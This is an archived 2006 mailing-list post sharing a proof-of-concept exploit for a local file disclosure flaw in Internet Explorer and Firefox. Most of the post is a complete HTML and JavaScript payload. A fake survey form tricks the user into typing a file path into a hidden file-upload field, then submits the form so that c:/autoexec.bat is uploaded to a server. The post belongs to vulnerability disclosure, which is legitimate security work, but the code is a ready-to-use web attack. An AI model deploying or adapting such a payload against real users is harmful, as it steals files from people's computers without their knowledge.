Vulnerability Development mailing list archives
InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)
From: sirdarckcat () gmail com
Date: 11 Jun 2006 09:37:33 -0000
This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here: http://www.techweb.com/showArticle.jhtml?articleID=188702202 and reported by Symantec. The subjects of the links sugested, are for forcing the user to input: FILE AUTOEXEC BAT so we can receive: file://c:/autoexec.bat and upload this file to a server. This is a low risk vulnerability. //--START HTML CODE--// <html> <body> <form method=post action="upload.php" type="multipart/form-data"> Please sugest 3 webpages for each subject (please include http:// or https://) <ul> <li>Freeware Files Download</li> <li>Automovilism</li> <li>Extreme Sports</li> <li>Technology</li> <li>Batman</li> </ul> <textarea name=other style="width:100%;height:50%"></textarea><br> <input type=file name=thet disabled style="visibility:hidden;height:1;width:1"> </form> <script> /** * OnKeyDown - JavaScript - Local File Disclosure vuln. PoC * by sirdarckcat [at] gmail [.] com * from: elhacker.net **/ var nidshift = new Array(0 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0); var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,65,84); var thefilew = "file://c:/autoexec.bat"; var dv = 0; var chift = false; var teo = document.forms[0].thet; var feo = document.forms[0].other; function checa(tecla) { var rt=(tecla.which)?tecla.which:event.keyCode; var lw=String.fromCharCode(rt); if (dv>=thefilew.length){ document.forms[0].submit(); } if (rt == 16){ chift = true; } if (rt==thefilek[dv]){ if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){ teo.disabled=false; teo.style.visibility="visible"; teo.focus(); feo.value += thefilew[dv]; dv++; } }else{ feo.focus(); teo.disabled=true; teo.style.visibility="hidden"; } } function solsh(tecla){ var rt=(tecla.which)?tecla.which:event.keyCode; if (rt == 16){ chift = false; } } function mprss(tecla){ var rt=(tecla.which)?tecla.which:event.keyCode; if (rt == 16){ chift = true; } } document.onkeydown = checa; document.onkeyup = solsh; document.onkeypress= mprss; </script> </body> </html> //--END HTML CODE--// Att. Sirdarckcat www.elhacker.net
Current thread:
- InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec) sirdarckcat (Jun 12)